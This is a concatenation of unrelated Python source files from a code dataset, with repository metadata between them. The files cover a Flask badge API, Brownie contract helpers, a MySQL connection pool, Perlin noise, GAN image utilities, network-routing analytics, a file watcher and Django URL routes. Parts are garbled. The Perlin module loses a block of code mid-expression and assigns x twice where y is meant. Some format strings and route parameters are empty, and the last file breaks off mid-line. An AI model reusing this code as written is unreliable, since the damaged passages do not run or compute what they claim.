'Badge added successfully'\n })\n\n@badges.route('/list', methods=[\"GET\"])\ndef show_all_badges():\n badges = Badge.query.all()\n data = []\n for badge in badges:\n data.append(badge.to_dict())\n return jsonify({\n 'success': True,\n 'message': '',\n 'data': data\n })\n\n\n@badges.route('/award', methods=[\"POST\"])\ndef create_badge_user_mapping():\n try:\n user = find_user_force(request.form['username'])\n badge = find_badge(request.form['badge'])\n existing = UserBadge.query.filter_by(user_id=user.id, badge_id=badge.id).all()\n if len(existing) > 0:\n return jsonify({\n 'success': False,\n 'message': 'User already has this badge'\n })\n mapping = UserBadge(user, badge)\n db.session.add(mapping)\n db.session.commit()\n except:\n return jsonify({\n 'success': False,\n 'message': 'Something went wrong :('\n })\n return jsonify({\n 'success': True,\n 'message': 'Badge awarded successfully'\n })\n\n@badges.route('/static/', methods=[\"GET\"])\ndef send_static(page):\n return send_from_directory('badges/static', page)","repo_name":"IIITSERC/SE_2016_GDE","sub_path":"srcGDE/badges/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"73102548329","text":"from brownie import(\n accounts,\n network,\n config,\n MockV3Aggregator,\n VRFCoordinatorMock,\n LinkToken,\n Contract,\n interface\n)\n\nDECIMALS = 18\nINITIALANSWER = 200000000000\n\nFORKED_ENVS = [\"mainnet-fork\", \"mainnet-fork-dev\"]\nLOCAL_DEVELOPMENT_ENVS = [\"development\", \"Ganache-local\"]\n\ncontract_to_mock = {\n \"eth_usd_price_feed\": MockV3Aggregator,\n \"vrf_coordinator\": VRFCoordinatorMock,\n \"link_token\": LinkToken,\n}\n\ndef get_account(index=None, id=None):\n if index:\n return accounts[index]\n if id:\n return accounts.load(id)\n if (\n network.show_active() in LOCAL_DEVELOPMENT_ENVS\n or network.show_active() in FORKED_ENVS\n ):\n return accounts[0]\n # if nothing above 3 statmens is true the below one will be done\n return accounts.add(config[\"Wallets\"][\"from_key\"])\n\ndef get_contract(contract_name):\n contract_type = contract_to_mock[contract_name]\n if network.show_active() in LOCAL_DEVELOPMENT_ENVS:\n if len(contract_type) <= 0:\n deploy_mock()\n contract = contract_type[-1]\n else:\n contract_address = config[\"networks\"][network.show_active()][contract_name]\n contract = Contract.from_abi(\n contract_type._name, contract_address, contract_type.abi\n )\n return contract\n\ndef deploy_mock():\n \n adbhut_print(f\"active network is {network.show_active()}\",\"=\")\n adbhut_print(\"Deploying MOCKS.....!!\",\"?\")\n MockV3Aggregator.deploy(\n DECIMALS, # Parameter that constructor takes this is _decimals\n INITIALANSWER, # Parameter that constructor takes _initialAnswer\n {\"from\": get_account()}, # since it is state change type\n )\n link_token = LinkToken.deploy({\"from\": get_account()})#deploying contract of link token\n VRFCoordinatorMock.deploy(link_token.address,{\"from\":get_account()})\n #deploying contract of VRFCoordinatorMock, tales link token address as input to contract \n adbhut_print(\"|||||||mock deployed|||||||\",\"=\")\n\ndef fund_with_link(\n contract_address, account=None, link_token=None, amount=100000000000000000\n): # 0.1 LINK\n account = account if account else get_account()\n link_token = link_token if link_token else get_contract(\"link_token\")\n tx = link_token.transfer(contract_address, amount, {\"from\": account})\n #OR\n # link_token_contract = interface.LinkTokenInterface(link_token.address)\n # tx = link_token_contract.transfer(contract_address, amount, {\"from\": account})\n #before doing this make sure to copy pasete the link token interface file into your interfaces folder\n tx.wait(1)\n adbhut_print(\"Contract Funded!\")\n return tx\n\ndef adbhut_print(input_str,second_char=\"=\"):\n char_pairs=int((len(input_str))/2)\n if (len(input_str))%2==0:\n char_len=(\"=\"+second_char)*char_pairs\n print(f\"{char_len}\\n{input_str}\\n{char_len}\")\n else:\n char_len=(\"=\"+second_char)*char_pairs\n print(f\"{char_len}=\\n{input_str}\\n{char_len}=\")\n\n","repo_name":"KingSlayer-KS/SmartContract-LOTTERY","sub_path":"scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"43408240805","text":"import logging\nimport threading\nimport contextlib\n\nfrom pymysql.connections import Connection\nfrom pymysql.cursors import DictCursor, Cursor\n\nfrom .pool import PoolContainer, PoolIsFullException, PoolIsEmptyException\n\nlogger = logging.getLogger('pymysqlpool')\n\n__all__ = ['MySQLConnectionPool']\n\n\nclass NoFreeConnectionFoundError(Exception):\n pass\n\n\nclass PoolBoundaryExceedsError(Exception):\n pass\n\n\nclass MySQLConnectionPool(object):\n\n def __init__(self, pool_name, host=None, user=None, password=\"\", database=None, port=3306,\n charset='utf8', use_dict_cursor=True, max_pool_size=30,\n enable_auto_resize=True, auto_resize_scale=1.5,\n pool_resize_boundary=48,\n defer_connect_pool=False, **kwargs):\n\n \"\"\"\n 初始化连接池.\n :param pool_name: 连接池的队列名.\n :param host: 数据库host\n :param user: 数据库用户名\n :param password: 数据库密码\n :param database: 数据库名\n :param port: 数据库端口\n :param charset: 数据库编码\n :param use_dict_cursor: 是否使用dict游标\n :param max_pool_size: 最大连接数\n :param enable_auto_resize: 是否允许动态更改最大连接数\n :param pool_resize_boundary: 设置数据库允许的最大连接\n :param auto_resize_scale: 连接池动态更改最大比例\n :param kwargs: 其他`pymysql.Connection`配置项\n \"\"\"\n # 数据库连接配置\n self._host = host\n self._user = user\n self._password = password\n self._database = database\n self._port = port\n self._charset = charset\n self._cursor_class = DictCursor if use_dict_cursor else Cursor\n self._other_kwargs = kwargs\n\n # 数据库连接池配置\n self._pool_name = pool_name\n self._max_pool_size = max_pool_size if max_pool_size < pool_resize_boundary else pool_resize_boundary\n self._enable_auto_resize = enable_auto_resize\n self._pool_resize_boundary = pool_resize_boundary\n if auto_resize_scale < 1:\n raise ValueError(\n \"Invalid scale {}, must be bigger than 1\".format(auto_resize_scale))\n\n self._auto_resize_scale = int(round(auto_resize_scale, 0))\n self._pool_container = PoolContainer(self._max_pool_size)\n\n self.__safe_lock = threading.RLock()\n self.__is_killed = False\n self.__is_connected = False\n\n if not defer_connect_pool:\n self.connect()\n\n def __repr__(self):\n return ''.format(self.pool_name, self.size)\n\n def __del__(self):\n self.close()\n\n def __iter__(self):\n return iter(self._pool_container)\n\n @property\n def pool_name(self):\n return self._pool_name\n\n @property\n def pool_size(self):\n return self._pool_container.pool_size\n\n @property\n def free_size(self):\n return self._pool_container.free_size\n\n @property\n def size(self):\n return ''.format(self._pool_resize_boundary,\n self._max_pool_size,\n self.pool_size,\n self.free_size)\n\n @contextlib.contextmanager\n def cursor(self, cursor=None):\n with self.connection(True) as conn:\n assert isinstance(conn, Connection)\n cursor = conn.cursor(cursor)\n\n try:\n yield cursor\n except Exception as err:\n conn.rollback()\n raise err\n finally:\n cursor.close()\n\n @contextlib.contextmanager\n def connection(self, autocommit=False):\n conn = self.borrow_connection()\n assert isinstance(conn, Connection)\n old_value = conn.get_autocommit()\n conn.autocommit(autocommit)\n try:\n yield conn\n except Exception as err:\n # logger.error(err, exc_info=True)\n raise err\n finally:\n conn.autocommit(old_value)\n self.return_connection(conn)\n\n def connect(self):\n \"\"\"\n 启动连接池\n \"\"\"\n if self.__is_connected:\n return\n\n logger.info('[{}] Connect to connection pool'.format(self))\n\n test_conn = self._create_connection()\n try:\n test_conn.ping()\n except Exception as err:\n raise err\n else:\n with self.__safe_lock:\n self.__is_connected = True\n\n self._adjust_connection_pool()\n finally:\n test_conn.close()\n\n def close(self):\n \"\"\"\n 关闭连接池\n \"\"\"\n try:\n logger.info('[{}] Close connection pool'.format(self))\n except Exception:\n pass\n\n with self.__safe_lock:\n if self.__is_killed is True:\n return True\n\n self._free()\n\n with self.__safe_lock:\n self.__is_killed = True\n\n def borrow_connection(self):\n \"\"\"\n 从连接池中获取一个连接\n \"\"\"\n block = True\n\n while True:\n conn = self._borrow(block)\n if conn is None:\n block = not self._adjust_connection_pool()\n else:\n return conn\n\n def _borrow(self, block):\n try:\n connection = self._pool_container.get(block, None)\n except PoolIsEmptyException:\n return None\n else:\n # 检查连接是否还存活\n connection.ping(reconnect=True)\n return connection\n\n def return_connection(self, connection):\n \"\"\"\n 将使用完连接放回��接池\n \"\"\"\n return self._pool_container.return_(connection)\n\n def _adjust_connection_pool(self):\n \"\"\"\n 动态调整连接池大小.\n \"\"\"\n # 创建几个新连接\n logger.debug('[{}] Adjust connection pool, '\n 'current size is \"{}\"'.format(self, self.size))\n\n if self.pool_size >= self._max_pool_size:\n if self._enable_auto_resize:\n self._adjust_max_pool_size()\n\n try:\n connection = self._create_connection()\n except Exception as err:\n logger.error(err)\n return False\n else:\n try:\n self._pool_container.add(connection)\n except PoolIsFullException:\n logger.debug('[{}] Connection pool is full now'.format(self.pool_name))\n return False\n else:\n return True\n\n def _adjust_max_pool_size(self):\n with self.__safe_lock:\n self._max_pool_size *= self._auto_resize_scale\n if self._max_pool_size > self._pool_resize_boundary:\n self._max_pool_size = self._pool_resize_boundary\n logger.debug('[{}] Max pool size adjusted to {}'.format(self, self._max_pool_size))\n self._pool_container.max_pool_size = self._max_pool_size\n\n def _free(self):\n \"\"\"\n 释放所有连接\n \"\"\"\n for connection in self:\n try:\n connection.close()\n except Exception as err:\n _ = err\n\n def _create_connection(self):\n \"\"\"\n 创建pymysql连接\n \"\"\"\n return Connection(host=self._host,\n user=self._user,\n password=self._password,\n database=self._database,\n port=self._port,\n charset=self._charset,\n cursorclass=self._cursor_class,\n **self._other_kwargs)\n","repo_name":"JeniTurtle/python-orm","sub_path":"libs/database/connect_pool/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":7929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"73580911848","text":"\"\"\"Perlin noise\n\"\"\"\n\nimport math\n\nfrom random import Random\n\n\nPERLIN_YWRAPB = 4\nPERLIN_YWRAP = 1<>= 1;\n\n\ndef noise(*args):\n \"\"\"Computes the Perlin noise (1D, 2D, or 3D) value at the specified coords.\n \"\"\"\n global perlin, perlinRandom\n\n x = args[0]\n y = args[1] if len(args) > 1 else 0\n z = args[2] if len(args) > 2 else 0\n\n if perlinRandom is None:\n perlinRandom = Random()\n\n if perlin is None:\n perlin = [perlinRandom.random() for i in xrange(PERLIN_SIZE + 1)]\n\n x = abs(x)\n x = abs(x)\n z = abs(z)\n\n xi, yi, zi = int(x), int(y), int(z)\n xf, yf, zf = x - xi, y - yi, z - zi\n\n r = 0\n ampl = 0.5\n\n for i in range(perlin_octaves):\n of = xi + (yi<= 1.0: xi += 1; xf -= 1;\n if yf >= 1.0: yi += 1; yf -= 1;\n if zf >= 1.0: zi += 1; zf -= 1;\n\n return r;\n\n# [toxi 031112]\n# now adjusts to the size of the cosLUT used via\n# the new variables, defined above\ndef noise_fsc(i):\n # using bagel's cosine table instead\n return 0.5 * (1.0 - perlin_cos_table[int(i*perlin_PI) % perlin_TWOPI])\n\n# # [toxi 040903]\n# # make perlin noise quality user controlled to allow\n# # for different levels of detail. lower values will produce\n# # smoother results as higher octaves are surpressed\n\n# public void noiseDetail(int lod) {\n# if (lod>0) perlin_octaves=lod;\n# }\n\n# public void noiseDetail(int lod, float falloff) {\n# if (lod>0) perlin_octaves=lod;\n# if (falloff>0) perlin_amp_falloff=falloff;\n# }\n\ndef noiseSeed(what):\n global perlinRandom, perlin\n if perlinRandom is None:\n perlinRandom = Random()\n perlinRandom.seed(what)\n perlin = None\n\n","repo_name":"croach/p5.py","sub_path":"lib/p5/perlin.py","file_name":"perlin.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"29128147111","text":"from tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers import (Dense, \n BatchNormalization, \n LeakyReLU, \n Reshape, \n Conv2DTranspose,\n Conv2D,\n Dropout,\n Flatten)\nfrom matplotlib import image\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow_addons as tfa\n\nIMAGE_SIZE = [256, 256]\n\ndef decode_image(image):\n image = tf.image.decode_jpeg(image, channels=3)\n image = (tf.cast(image, tf.float32) / 127.5) - 1\n image = tf.reshape(image, [*IMAGE_SIZE, 3])\n return image\n\ndef read_tfrecord(example):\n tfrecord_format = {\n \"image\": tf.io.FixedLenFeature([], tf.string)\n }\n example = tf.io.parse_single_example(example, tfrecord_format)\n image = decode_image(example['image'])\n return image\n\ndef load_dataset(filenames):\n dataset = tf.data.TFRecordDataset(filenames)\n dataset = dataset.map(read_tfrecord)\n return dataset\n\ndef down_sample(filters, size, apply_instancenorm=True):\n initializer = tf.random_normal_initializer(0., 0.02)\n gamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\n layer = keras.Sequential()\n layer.add(layers.Conv2D(filters, size, strides=2, padding='same', kernel_initializer=initializer, use_bias=False))\n\n if apply_instancenorm:\n layer.add(tfa.layers.InstanceNormalization(gamma_initializer=gamma_init))\n\n layer.add(layers.LeakyReLU())\n\n return layer\n\ndef up_sample(filters, size, apply_dropout=False):\n initializer = tf.random_normal_initializer(0., 0.02)\n gamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\n layer = keras.Sequential()\n layer.add(layers.Conv2DTranspose(filters, size, strides=2, padding='same', kernel_initializer=initializer,use_bias=False))\n layer.add(tfa.layers.InstanceNormalization(gamma_initializer=gamma_init))\n\n if apply_dropout:\n layer.add(layers.Dropout(0.5))\n\n layer.add(layers.ReLU())\n\n return layer\n\ndef Generator():\n inputs = layers.Input(shape=[256,256,3])\n down_stack = [\n down_sample(64, 4, apply_instancenorm=False),# (size, 128, 128, 64)\n down_sample(128, 4), # (size, 64, 64, 128)\n down_sample(256, 4), # (size, 32, 32, 256)\n down_sample(512, 4), # (size, 16, 16, 512)\n down_sample(512, 4), # (size, 8, 8, 512)\n down_sample(512, 4), # (size, 4, 4, 512)\n down_sample(512, 4), # (size, 2, 2, 512)\n down_sample(512, 4), # (size, 1, 1, 512)\n ]\n\n up_stack = [\n up_sample(512, 4, apply_dropout=True), # (size, 2, 2, 1024)\n up_sample(512, 4, apply_dropout=True), # (size, 4, 4, 1024)\n up_sample(512, 4, apply_dropout=True), # (size, 8, 8, 1024)\n up_sample(512, 4), # (size, 16, 16, 1024)\n up_sample(256, 4), # (size, 32, 32, 512)\n up_sample(128, 4), # (size, 64, 64, 256)\n up_sample(64, 4), # (size, 128, 128, 128)\n ]\n\n initializer = tf.random_normal_initializer(0., 0.02)\n last = layers.Conv2DTranspose(3, 4, strides=2, padding='same', kernel_initializer=initializer, activation='tanh') \n # (size, 256, 256, 3)\n\n x = inputs\n\n # Downsampling through the model\n skips = []\n for down in down_stack:\n x = down(x)\n skips.append(x)\n\n skips = reversed(skips[:-1])\n\n # Upsampling and establishing the skip connections\n for up, skip in zip(up_stack, skips):\n x = up(x)\n x = layers.Concatenate()([x, skip])\n\n x = last(x)\n\n return keras.Model(inputs=inputs, outputs=x)\n\ndef make_generator_model():\n model = tf.keras.Sequential()\n model.add(Dense(7*7*512, use_bias=False, input_shape=(256,))) #originally 7*7*7, 256*256\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Reshape((7,7,512)))#was 7,7,512\n# assert model.output_shape == (None, 7, 7, 512) # Note: None is the batch size\n model.add(Conv2DTranspose(128, (5, 5), strides=(1, 1), padding='same', use_bias=False)) #originally 128\n# assert model.output_shape == (None, 7, 7, 128)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n \n model.add(Conv2DTranspose(64, (5, 5), strides=(2, 2), padding='same', use_bias=False)) #originally 64\n# assert model.output_shape == (None, 14, 14, 64)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Conv2DTranspose(3, (5, 5), strides=(2, 2), padding='same', use_bias=False, activation='tanh'))#originally 3\n# print(model.output_shape)\n# assert model.output_shape == (None, 28, 28, 3)\n return model\n\n\ndef randomNoiseModel(file):\n gen = make_generator_model()\n gen.load_weights('models/generator4.h5')\n\n noise = tf.random.normal([3, 256])*127.5+100\n plt.imsave('static/input.png', noise.numpy())#.clip(0, 1))\n\n modelOutput = gen(noise)[0]\n plt.imsave(f'static/{file}', modelOutput.numpy().clip(0, 1))\n\n\ndef monetModel(fileIn, fileOut):\n\n print(fileIn)\n monet_generator = Generator()\n monet_generator.load_weights('models/vangogh_generator.h5')\n for img in load_dataset(f'static/{fileIn}').batch(1):\n inputImage = img\n\n inputSaveImage = inputImage[0].numpy().clip(0,1)\n plt.imsave('static/input.png', inputSaveImage)\n\n #inputImage = image.imread(f'static/test3.jpg')\n\n #monet_ds = load_dataset(MONET_FILENAMES).batch(1)\n #modelInput = tf.reshape(tf.convert_to_tensor(image.imread(f'static/test3.jpg')), [1, 256, 256, 3])\n #modelInput = tf.random.normal([1, 256, 256, 3])#*127.5+100\n \n\n #modelOutput = monet_generator(modelInput)[0]\n modelOutput = monet_generator(inputImage, training=False)[0].numpy().clip(0,1)\n plt.imsave(f'static/{fileOut}', modelOutput)","repo_name":"CornellDataScience/GAN-Art-Generation","sub_path":"flask-app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13821988038","text":"from math import sqrt\nimport numpy as np\nfrom KJ import grad_projected\nfrom JS import barrier_method\n\n\nc = 3e5 # km / sec\n# Return path delay between two nodes\n\n\ndef delay(loc_1, loc_2):\n x = loc_1[0] - loc_2[0]\n y = loc_1[1] - loc_2[1]\n return sqrt(x * x + y * y) / c * 10 # multiplied by 10 for scaling\n\n\ndef delay_return(locations_source, locations_server):\n '''\n\tInputs: two layers location coordinates (array)\n\tOutputs: two layers delay matrix (array)\n\t'''\n\n m = len(locations_source)\n n = len(locations_server)\n delay_matrix = np.zeros((m, n))\n for i in range(m):\n for k in range(n):\n delay_matrix[i, k] = delay(locations_source[i], locations_server[k])\n return delay_matrix\n\n\ndef analytic_avg_delay_two_layers(arrival_rates, service_rates, delta, A):\n \"\"\"\n :param arrival_rates: arrival_rates (array, 1 by m size)\n :param service_rates: service_rates (array, 1 by n size)\n :param delta:\n :param A: routing probabilities (array m by n size)\n :return: expected service time including propagation delay considering just two layers\n \"\"\"\n\n m = len(arrival_rates)\n n = len(service_rates)\n lambda_hat = np.matmul(arrival_rates, A)\n res_sum = 0\n for i in range(m):\n res_sum += np.dot(A[i, :], 1 / (service_rates - lambda_hat) + delta[i, :]) * arrival_rates[i]\n return res_sum / sum(arrival_rates)\n\n\ndef analytic_avg_delay(rates, delta, routing_p, vol_dec):\n \"\"\"\n :param rates: [array (rates in layer 0), array (rates in layer 1), ...]\n :param delta:\n :param routing_p: routing probabilities [array (routing probabilites in layer 0), array (routing probabilites in layer 1), ...]\n :param vol_dec:\n :return: expected service time including propagation delay\n \"\"\"\n layer_num = len(rates)\n lambda_hat = [np.zeros((1, len(rates[i]))) for i in range(layer_num)]\n lambda_hat[0] = rates[0]\n for i in range(1, layer_num):\n lambda_hat[i] = np.matmul(lambda_hat[i - 1], routing_p[i - 1])\n test = rates[i] - lambda_hat[i]\n if test[test <= 0]:\n print(\"Initial A is wrong!\")\n return 1\n res_sum = 0\n for i in range(layer_num - 1):\n res_sum += analytic_avg_delay_two_layers(lambda_hat[i], rates[i + 1] / vol_dec[:i+1].prod(), delta[i], routing_p[i])\n return res_sum\n\n\ndef no_delay_optimal(arrival_rates, service_rates):\n '''\n \tFind the optimal completion time using Lagrange multiplier for a network without propagation delays\n \tconsidering only two layers\n '''\n n = len(service_rates)\n num = 0\n for j in range(n):\n num += sqrt(service_rates[j])\n denom = sum(service_rates) - sum(arrival_rates)\n K = pow(num / denom, 2)\n lambda_hat = np.zeros((n, 1))\n for j in range(n):\n lambda_hat[j] = service_rates[j] - sqrt(service_rates[j]/K)\n service_time = 0\n for j in range(n):\n service_time += lambda_hat[j] / (service_rates[j] - lambda_hat[j])\n service_time = service_time / sum(arrival_rates)\n result = {'lambda_hat': lambda_hat, 'Mean_completion_time': service_time}\n return result\n\n\ndef cur_vol(cur_layer_index, layer_dic, vol_dec):\n data_type_num = len(layer_dic.keys())\n res = np.ones(data_type_num)\n for i in range(data_type_num):\n for j in range(cur_layer_index + 1):\n res[i] *= vol_dec[i, j]\n return res\n\n\ndef effective_rates(arrival_rates, service_rates, cur_layer_index, layer_dic, data_dist, vol_dec):\n data_type_num = len(data_dist)\n effective_dist = np.zeros(data_type_num)\n data_vol = cur_vol(cur_layer_index, layer_dic, vol_dec)\n for i in range(data_type_num):\n if layer_dic[i].count(cur_layer_index + 1) > 0:\n effective_dist[i] = data_dist[i]\n eff_arrival_rates = arrival_rates * sum(effective_dist)\n eff_service_rates = service_rates / (np.dot(data_vol, effective_dist) / sum(effective_dist))\n return [eff_arrival_rates, eff_service_rates]\n\n\ndef grad_multi_layers(rates, delta, layer_dic, data_type_dist, vol_dec):\n layer_num = len(rates)\n optimal_a = []\n source_rates = rates[0]\n for l in range(layer_num - 2):\n temp_arr_rates = source_rates\n temp_ser_rates = rates[l + 1]\n eff_rates = effective_rates(temp_arr_rates, temp_ser_rates, l, layer_dic, data_type_dist, vol_dec)\n eff_arr_rates = eff_rates[0]\n eff_ser_rates = eff_rates[1]\n if sum(eff_arr_rates) == 0: # just passing through the layer\n temp_a = np.ones((len(eff_arr_rates), len(eff_ser_rates))) / len(eff_ser_rates)\n else:\n initial_a = valid_initial_rates(eff_arr_rates, eff_ser_rates, 0.9)\n temp_res = grad_projected(eff_arr_rates, eff_ser_rates, delta[l], initial_a)\n temp_a = temp_res['A']\n optimal_a.append(temp_a)\n source_rates = np.matmul(source_rates, temp_a)\n last_layer_num = len(rates[layer_num - 2])\n optimal_a.append(np.ones((last_layer_num, 1)))\n return optimal_a\n\n\ndef barrier_multi_layers(rates, delta, layer_dic, data_type_dist, vol_dec):\n layer_num = len(rates)\n optimal_a = []\n source_rates = rates[0]\n for l in range(layer_num - 2):\n temp_arr_rates = source_rates\n temp_ser_rates = rates[l + 1]\n eff_rates = effective_rates(temp_arr_rates, temp_ser_rates, l, layer_dic, data_type_dist, vol_dec)\n eff_arr_rates = eff_rates[0]\n eff_ser_rates = eff_rates[1]\n if sum(eff_arr_rates) == 0: # just passing through the layer\n temp_a = np.ones((len(eff_arr_rates), len(eff_ser_rates))) / len(eff_ser_rates)\n else:\n initial_a = valid_initial_rates(eff_arr_rates, eff_ser_rates, 0.9)\n temp_res = barrier_method(eff_arr_rates, eff_ser_rates, delta[l], initial_a)\n temp_a = temp_res['A']\n optimal_a.append(temp_a)\n source_rates = np.matmul(source_rates, temp_a)\n last_layer_num = len(rates[layer_num - 2])\n optimal_a.append(np.ones((last_layer_num, 1)))\n return optimal_a\n\n\ndef valid_initial_rates(source_rates, server_rates, para):\n \"\"\"\n :param source_rates: source rates (array)\n :param server_rates: server rates (array)\n :param para: parameter for finding initial rates\n :return: valid initial routing probabilities that guarantees queue stability\n \"\"\"\n eps = 0.001\n sources_num = len(source_rates)\n servers_num = len(server_rates)\n initial_a = eps * np.ones((sources_num, servers_num))\n for i in range(servers_num):\n temp = np.ones(sources_num) * para * server_rates[i] / np.sum(source_rates)\n initial_a[:, i] = np.minimum(temp, 1 - np.sum(initial_a, 1) + initial_a[:, i])\n source_rates = np.matmul(source_rates.reshape((1, sources_num)), initial_a).flatten()\n # print(server_rates - source_rates) # to check validity\n return initial_a\n\n\ndef legacy_optimal_routing(locations):\n \"\"\"\n :param locations: coordinates info for spatial distribution of nodes in the network\n :return: a, (list that consists of arrays) the optimal routing probability in the legacy network\n \"\"\"\n layer_num = len(locations)\n a = [np.zeros((len(locations[i]), len(locations[i + 1]))) for i in range(layer_num - 1)]\n for i in range(layer_num - 1):\n for j in range(len(locations[i])):\n delay_info = [delay(locations[i][j], locations[i + 1][k]) for k in range(len(locations[i + 1]))]\n min_delay_index = np.argmin(delay_info)\n a[i][j][min_delay_index] = 1\n return a\n\n\ndef bandwidth_efficiency(vol_dec, data_type_dist, layer_dic, source_rates):\n \"\"\"\n :param vol_dec: (array), volume decrease ratio after processing in each layer for each data type\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :param source_rates: (array), source rates in the network\n :return: res, bandwidth efficiency which is proportion to the product of rate and data volume\n \"\"\"\n layer_num = np.size(vol_dec, axis=1)\n res = 0\n data_type_num = len(data_type_dist)\n departure_process_rate = sum(source_rates)\n for l in range(layer_num - 1):\n temp_dist = np.zeros(data_type_num)\n for i in range(data_type_num):\n temp_max_layer = max(layer_dic[i])\n if temp_max_layer > l:\n temp_dist[i] = data_type_dist[i]\n cur_vol_temp = cur_vol(l, layer_dic, vol_dec)\n avg_data_vol = np.dot(cur_vol_temp, temp_dist)\n res += avg_data_vol\n return departure_process_rate * res\n\n\ndef bandwidth_efficiency_compare(data_type_dist, source_rates, layer_dic, vol_dec):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param source_rates: (array), source rates in the network\n :param layer_dic: (dictionary), required layer info for each data type\n :param vol_dec: (array), volume decrease ratio after processing in each layer for each data type\n :return: res, ratio of bandwidth usages between in-network processing and legacy networks\n \"\"\"\n data_type_num = len(data_type_dist)\n layer_num = np.size(vol_dec, axis=1)\n legacy_vol_dec = np.ones((data_type_num, layer_num))\n legacy_data_type_dist = np.array([1])\n legacy_layer_dic = {0: [0, layer_num - 1]}\n b_e_legacy = bandwidth_efficiency(legacy_vol_dec, legacy_data_type_dist, legacy_layer_dic, source_rates)\n b_e_in_network_processing = bandwidth_efficiency(vol_dec, data_type_dist, layer_dic, source_rates)\n res = b_e_in_network_processing / b_e_legacy\n return res\n\n\ndef avg_last_layer(data_type_dist, layer_dic):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :return: res, average last layer\n \"\"\"\n temp = list(layer_dic.values())\n temp_max = np.array([max(temp[i]) for i in range(len(data_type_dist))])\n res = np.dot(data_type_dist, temp_max)\n return res\n\n\ndef avg_sum_required_layer(data_type_dist, layer_dic):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :return: res, expected sum of the required layers\n \"\"\"\n temp = list(layer_dic.values())\n temp_sum = np.array([sum(temp[i]) for i in range(len(data_type_dist))])\n res = np.dot(data_type_dist, temp_sum)\n return res\n\n","repo_name":"Youngrock-Oh/Data_centric_network","sub_path":"Analytic_res.py","file_name":"Analytic_res.py","file_ext":"py","file_size_in_byte":10392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"74742277929","text":"import time\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nclass TestHandler(FileSystemEventHandler):\n def on_any_event(self, event):\n print(f\"Event detected: {event}\")\n\nobserver = Observer()\nevent_handler = TestHandler()\nobserver.schedule(event_handler, path='C:\\\\Users\\\\oropesa\\\\Documents\\\\Magicus', recursive=True)\nobserver.start()\n\ntry:\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n observer.stop()\nobserver.join()\n#this is just a commentdsfgdggggbg","repo_name":"thepwnman33/Magicus","sub_path":"test_watch.py","file_name":"test_watch.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70275139690","text":"import pandas_gbq\n\n\nclass BigQueryExporter:\n def __init__(self, credentials, project_id, table_name):\n self.credentials = credentials\n self.project_id = project_id\n self.table_name = table_name\n\n def export(self, df):\n pandas_gbq.to_gbq(\n dataframe=df,\n destination_table=self.table_name,\n project_id=self.project_id,\n if_exists='append')\n","repo_name":"crazydev71/ga-export","sub_path":"jobs/exporters/big_query_exporter.py","file_name":"big_query_exporter.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"26678415217","text":"from django.urls import path, include\nfrom . import views\nfrom .views import *\nfrom rest_framework import routers\n\nrouter = routers.SimpleRouter()\nrouter.register(r'books_api', views.BookViewSet)\nrouter.register(r\"author_books\", views.Author_BookViewSet)\nrouter.register(r\"author_book_detail\", views.Author_Book_DetailViewSet)\nrouter.register(r\"book_detail\", views.Book_DetailViewSet)\nrouter.register(r\"collection_API\", views.Collection_API_ReturnViewSet)\nrouter.register(r\"subject_book_API\", views.Subject_API_ReturnViewSet)\nrouter.register(r\"audiobook_api\", views.AudioBookViewSet, basename=\"audiobooks\")\n#router.register(r\"multiplebooks\", views.ReadingListSearchView, basename=\"readinglist\")\n\n#router.register(r\"booksearch\", views.BookSearch)\n\nurlpatterns = [\n path('', views.books),\n path('', include(router.urls)),\n path('booksearch/', views.BookSearch.as_view(), name=\"BookSearch\"),\n path('authorsearch/', views.AuthorSearch.as_view(), name=\"AuthorSearch\"),\n path('subjectsearch/', views.SubjectSearch.as_view(), name=\"SubjectSearch\"),\n path('collectionsearch/', views.CollectionSearch.as_view(), name=\"CollectionSearch\"),\n path('bookbyid/', views.BookById.as_view(), name=\"BookByID\"),\n path('collections/', views.Collections.as_view(), name=\"Collections\"),\n path(\"author_book//\", Author_BookAPIView.as_view(), name=\"AuthorBookLookup\"),\n path(\"collection_book//\", Collection_BookAPIView.as_view(), name=\"CollectionBookLookup\"),\n path(\"bookmetadata//\", BookMetaDataView.as_view(), name=\"MetaData\"),\n path(\"bookmetadatalookup//\", BookMetaDataLookupAPIView.as_view(), name=\"MetaDataLookup\"),\n path(\"audiobooks//\", AudioBookView.as_view(), name=\"AudioBookLookup\"),\n\n #path(\"collection_api/\", 